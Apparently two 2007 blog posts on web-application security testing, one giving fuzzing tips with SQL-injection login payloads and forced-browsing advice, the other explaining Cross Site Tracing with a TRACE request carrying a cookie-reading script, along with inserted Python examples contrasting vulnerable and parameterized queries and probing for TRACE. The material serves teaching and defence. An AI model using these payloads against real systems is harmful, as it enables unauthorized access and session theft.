You have to understand the box to think outside of it.<br /><br /><span style="font-weight: bold;">Fuzzing</span><br />Error messages are your friend. Try using all the tools above to inject data into the application that it is not expecting and see how it reacts. If you have the source code, then you can see what will work and what will not. Try to forcefully browse to URLs that are either outside your role or without even logging in. I have been granted access to all the admin features of many applications just because the developers didn't think that people could guess URLs and did not validate the session before performing updates.<br />Look for URLs that update data. Try injecting SQL characters like a tick mark (single quote) into the POST parameters of these and observe how the application reacts. Always try logging in with <span style="color: rgb(255, 0, 0);">pwnd' OR 1=1 --</span> or a variation like <span style="color: rgb(255, 0, 0);">pwnd' OR '1'='1' and rownum=1 --<span style="color: rgb(0, 0, 0);"> .<br />Study how the application is using cookies and sessions. How much data is stored server-side vs. client-side (i.e. in the browser)? Anything sent to the client can be modified before resubmitting it to the server.<br /><br /><br />I hope this is informative to some people. This is what seems to work well for me. 
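The login-bypass probe from the Fuzzing section above, as an added example in Python that is not code from the original post: a login query built by string concatenation (the kind the tick-mark probe and the pwnd' OR 1=1 -- login are looking for) beside the parameterized form that defeats it. It uses Python's built-in sqlite3 module against a constructed one-row users table (assumed sample data, not from the post), so it runs offline; the probe_error helper reproduces the "error messages are your friend" step by sending a lone tick mark and capturing the database error the concatenated query leaks.

```python
"""Login check two ways: string-concatenated SQL beside a parameterized query.

Added example, not from the original post. The users table and its one row
are constructed sample data so the script runs offline.
"""
import sqlite3


def make_db():
    """Constructed sample data: one ordinary user with a known password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the post is probing for: user input is pasted straight into
    the SQL text, so a tick mark in the input changes the query itself."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    (count,) = conn.execute(query).fetchone()
    return count > 0


def login_safe(conn, username, password):
    """Parameterized form: the driver binds the values, so a tick mark is just
    data and cannot alter the WHERE clause or comment out the password check."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    (count,) = conn.execute(query, (username, password)).fetchone()
    return count > 0


def probe_error(conn, username):
    """Fuzzing step from the post: send a lone tick mark and watch the reaction.
    Returns the database error the concatenated query raises (None if it ran
    cleanly) together with the parameterized query's result for the same input."""
    try:
        login_vulnerable(conn, username, "x")
        error = None
    except sqlite3.OperationalError as exc:
        error = str(exc)
    return {"vulnerable_error": error, "safe_result": login_safe(conn, username, "x")}


if __name__ == "__main__":
    db = make_db()
    payload = "pwnd' OR 1=1 --"          # the post's first login payload
    print("concatenated:", login_vulnerable(db, payload, "wrong"))   # True
    print("parameterized:", login_safe(db, payload, "wrong"))        # False
    print("tick-mark probe:", probe_error(db, "'"))
```

With the post's payload the concatenated query becomes `... WHERE username = 'pwnd' OR 1=1 --' AND password = 'wrong'`; the `--` comments out the password check and `OR 1=1` matches every row, so the login succeeds. The parameterized query sees the whole payload as a username value and finds nothing. The lone tick mark makes the concatenated query unparseable, which is exactly the error message the post says to look for.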
Again, I would love to hear about what other people use, so please feel free to leave comments.<br /><br /><br /></span></span><br />Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2410549130005981530.post-56165772516780664252007-09-22T20:22:00.001-05:002007-10-03T03:07:10.566-05:00Cross Site Tracing<span style="font-weight: bold;">Overview</span><br />When I first discovered XST, I thought it seemed really bad. TRACE is a method accepted by the web server like GET, POST, etc., but TRACE basically echoes back the HTTP data that you throw at it. It's usually used for debugging and should not be enabled in your production environment after it has been deployed. Since it echoes back the request, it is highly susceptible to Cross Site Scripting. The goal here is to collect the user's session cookie.<br /><br />The problem is that I cannot think of a way that a user could be misled into executing an XST vulnerability that would be advantageous to the attacker. There are a couple of ways to execute XST... Java sockets, the Microsoft.XMLHTTP ActiveX object, and Flash. The problem with Java sockets is that they will create their own connections separate from the browser and therefore not transmit cookies or sessions. It seems possible with the other two, but all three seem to need an existing XSS vulnerability. 
The only thing that XST gets you is the possibility to steal httpOnly cookies. <a href="http://msdn2.microsoft.com/en-us/library/ms533046.aspx">HttpOnly cookies</a> are not accessible with JavaScript. To me, the real vulnerability would be the XSS and not the XST.<br /><br /><br /><span style="font-weight: bold;">How to test if your server is vulnerable to XST.</span><br />To test if your server is vulnerable, I will use <a href="http://portswigger.net/suite/">Burp Suite</a>. Open Burp and choose <span style="font-weight: bold;">repeater</span>. Change the request to something similar to:<br /><span style="color: rgb(255, 0, 0);">TRACE / HTTP/1.0</span><br /><span style="color: rgb(255, 0, 0);">Header1: <script>alert(document.cookie);</script></span><br /><br />The reply should look like this if TRACE is enabled:<br /><br /><span style="color: rgb(255, 0, 0);">HTTP/1.1 200 OK</span><br /><span style="color: rgb(255, 0, 0);">Date: Sun, 23 Sep 2007 02:48:05 GMT</span><br /><span style="color: rgb(255, 0, 0);">Server: Apache/1.3.34 (Ubuntu) mod_perl/1.29</span><br /><span style="color: rgb(255, 0, 0);">Connection: close</span><br /><span style="color: rgb(255, 0, 0);">Content-Type: message/http</span><br /><br /><span style="color: rgb(255, 0, 0);">TRACE / HTTP/1.0</span><br /><span style="color: rgb(255, 0, 0);">Header1: <script>alert(document.cookie);</script></span><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_acrzuhZS74A/RvXVEqYUXXI/AAAAAAAAApk/HHUMvW007rY/s1600-h/XST_cut.png"><img id="BLOGGER_PHOTO_ID_5113227228021546354" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="http://bp1.blogger.com/_acrzuhZS74A/RvXVEqYUXXI/AAAAAAAAApk/HHUMvW007rY/s320/XST_cut.png" border="0" /></a><br />If you use <a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab</a> as your proxy, then select <span style="font-weight: 
bold;">Manual Request</span> and perform the same steps.<br /><br /><span style="font-weight: bold;">Defenses<br /></span>Prevention of this vulnerability is really simple. If you're using Apache, then you need to install the <a href="http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html">mod_rewrite engine</a>. Add the following lines to your httpd.conf file.<br /><br /><span style="color: rgb(51, 255, 51);">RewriteEngine On</span><br /><span style="color: rgb(51, 255, 51);">RewriteCond %{REQUEST_METHOD} ^TRACE</span><br /><span style="color: rgb(51, 255, 51);">RewriteRule .* - [F]</span><br /><br />If you're using IIS, then you need to filter out everything but GET, POST, and HEAD with <a href="http://www.microsoft.com/technet/security/tools/urlscan.mspx">UrlScan</a>.<br /><br /><span style="font-weight: bold;">References</span><br /><a href="http://msdn2.microsoft.com/en-us/library/ms533046.aspx">http://msdn2.microsoft.com/en-us/library/ms533046.aspx</a><br /><a href="http://jeremiahgrossman.blogspot.com/2007/04/xst-lives-bypassing-httponly.html">http://jeremiahgrossman.blogspot.com/2007/04/xst-lives-bypassing-httponly.html</a><br /><a href="http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html">http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html</a><br /><a href="http://www.microsoft.com/technet/security/tools/urlscan.mspx">http://www.microsoft.com/technet/security/tools/urlscan.mspx</a><br /><br />Unknownnoreply@blogger.com5
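The TRACE check from the "How to test" section of the Cross Site Tracing post above, as an added example in Python instead of Burp's Repeater; it is not code from the original post. It sends the same TRACE request over a plain socket and decides from the reply whether TRACE is live, which is what you do by eye when reading the Repeater output: a 200 with Content-Type message/http whose body echoes the request back. The marker header value (xst-probe) and the two sample replies are constructed for the example; the enabled reply is modelled on the Apache response shown in the post, the refused one on the 403 the post's mod_rewrite rule produces.

```python
"""Probe whether a web server answers TRACE (the precondition for XST).

Added example, not from the original post. check_host is for servers you
administer; trace_enabled/parse_trace_response work on any saved reply.
"""
import socket

# Constructed marker header: seeing it echoed in the body proves the server
# reflected our request rather than answering with some unrelated 200 page.
MARKER = b"Header1: xst-probe"
TRACE_REQUEST = b"TRACE / HTTP/1.0\r\nHost: %s\r\n" + MARKER + b"\r\n\r\n"


def parse_trace_response(raw):
    """Split a raw HTTP reply into status code, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1", "replace").split("\r\n")
    parts = lines[0].split(" ", 2) if lines else []
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status": status, "headers": headers, "body": body}


def trace_enabled(raw):
    """TRACE is live when the reply is 200, typed message/http, and the body
    carries our marker header back verbatim (the echo XST relies on)."""
    resp = parse_trace_response(raw)
    ctype = resp["headers"].get("content-type", "")
    return (
        resp["status"] == 200
        and ctype.startswith("message/http")
        and MARKER in resp["body"]
    )


def check_host(host, port=80, timeout=5.0):
    """Send the probe to a server you administer and return the verdict."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(TRACE_REQUEST % host.encode("ascii"))
        chunks = []
        while True:  # HTTP/1.0: the server closes the connection when done
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return trace_enabled(b"".join(chunks))


# Constructed sample replies (not captures): the first mirrors the Apache
# response in the post, the second is what the post's RewriteRule [F] returns.
SAMPLE_ENABLED = (
    b"HTTP/1.1 200 OK\r\nDate: Sun, 23 Sep 2007 02:48:05 GMT\r\n"
    b"Server: Apache/1.3.34 (Ubuntu) mod_perl/1.29\r\nConnection: close\r\n"
    b"Content-Type: message/http\r\n\r\n"
    b"TRACE / HTTP/1.0\r\nHost: localhost\r\nHeader1: xst-probe\r\n\r\n"
)
SAMPLE_DISABLED = (
    b"HTTP/1.1 403 Forbidden\r\nServer: Apache/1.3.34 (Ubuntu) mod_perl/1.29\r\n"
    b"Connection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n"
    b"<html><body><h1>Forbidden</h1></body></html>"
)

if __name__ == "__main__":
    print("sample with TRACE on :", trace_enabled(SAMPLE_ENABLED))   # True
    print("sample with TRACE off:", trace_enabled(SAMPLE_DISABLED))  # False
```

A 200 alone is not enough evidence: some servers answer every unknown method with the default page, which is why the check also insists on the message/http type and the echoed marker. Run check_host before and after applying the Defenses section's rewrite rule to confirm the fix took; on Apache 1.3.34 and 2.0.55 or later, the TraceEnable off directive is an alternative to the rewrite rule.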